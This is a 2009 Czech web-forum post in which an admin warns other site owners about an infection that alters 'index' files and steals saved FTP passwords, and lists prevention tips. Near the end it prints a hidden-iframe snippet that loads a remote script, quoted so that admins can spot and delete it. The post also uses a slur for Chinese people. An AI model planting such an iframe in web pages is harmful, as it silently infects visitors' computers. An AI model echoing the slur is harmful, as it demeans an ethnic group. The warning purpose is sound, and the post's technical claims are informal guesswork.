Nový brutal virus!!!! -nejedná se o hoax, přátelé.

úplně mimo téma
Odpovědět
Avatar uživatele
Radim Vaňousek
Sponzor Brodce
Příspěvky: 993
Registrován: 02 Pro 2006, 14:54
Místo/Bydliště: Brodce
Kontaktovat uživatele:

Nový brutal virus!!!! -nejedná se o hoax, přátelé.

Příspěvek od Radim Vaňousek » 18 Dub 2009, 11:47

Vážení čtenáři i vy sousední adminové,

musím vás upozornit na nový virus, který se šíří po netu jako mor. Zatím nemá oficiální jméno, avšak víme, že se jedná o práci našich šikmookých přátel z Číny.

Kde ho chytíte, jak se projevuje a koho postihuje?
Chytit se dá i na vlastních stránkách. Pravděpodobně infikuje hostitelský server a v něm všechny soubory, které mají v názvu "index". Druhá možnost je, že si zalezete na již infikovanou stránku, vir se vám přenese do počítače ze kterého odešle hesla z Total Commanderu (či jiných jednoduchých FTP klientů) na jednu čínskou online databázi. V níž se vygeneruje další inteligentní virus, který se vám vrátí do počítače, odkud může s již zapůjčenými hesly překopat vaše internetové stránky. Téměř přikaždém kliknutí na vašich stránkách (nebo spíše "při každém přejití na soubor "index") se vám odešle bordel do počítače. "bordelem" je myšlený infikovaný soubor, který naleznete v cache složce vašeho internetového prohlížeče.

Mně se takový soubor objevoval jako OP0AE, OP0AF, OP0AG atp. poněvadž používám prohlížeč Operu 10.

Jelikož se jedná o replikovací virus, zaručeně vám poblázní jakýkoliv antivirový software (včetně renomovaného Webrootu), jiný AV (např. symantec) nic nenajde.

Před týdnem kleknul pod virem Hradeckydvur.net, dnes byl infikován Sartor.cz (nějaké potlačení a prevenci jsme u Sartoru udělali, ale čistit jej budeme až tuto neděli.)

Stejný případ, jiný admin ZDE:
http://community.norton.com/norton/boar ... read.id=97

Prevence
1. informujte hostingovou společnost svých stránek o tomto viru.
2. naučte se neukládat hesla do počítače (jakákoliv)
3. pravidelně zálohujte své stránky
4. Vyberte si kvalitnější antispyware a antivirus podle TopTen
http://anti-virus-software-review.toptenreviews.com/
http://anti-spyware-review.toptenreviews.com/
Pokud platíte za bezpečnost počítače, tak přejděte na Webroot kombinaci, která je sice za 59 dolárů na rok. Pirátskou verzi ani nehledejte, nenajdete. Bohužel :x
5. používejte encryptovaný přístup na FTP
6. adminům doporučuji bloknout všem IP pro login na FTP.

----------------------- 18 dub 2009 11:40 am ---------------------

Pokud naleznete na svých stránkách takovýto, či podobný IFRAME "hidden" kód:

Kód: Vybrat vše

<iframe src="http://91.212.41.241/in.php" width=1 height=1 style="visibility:hidden"></iframe>
Nemilosrdně jej smažte!

Odpovědět

Vrátit se na “Smetiště”

Kdo je online

Uživatelé prohlížející si toto fórum: Nejsou tu žádní registrovaní uživatelé a 1 host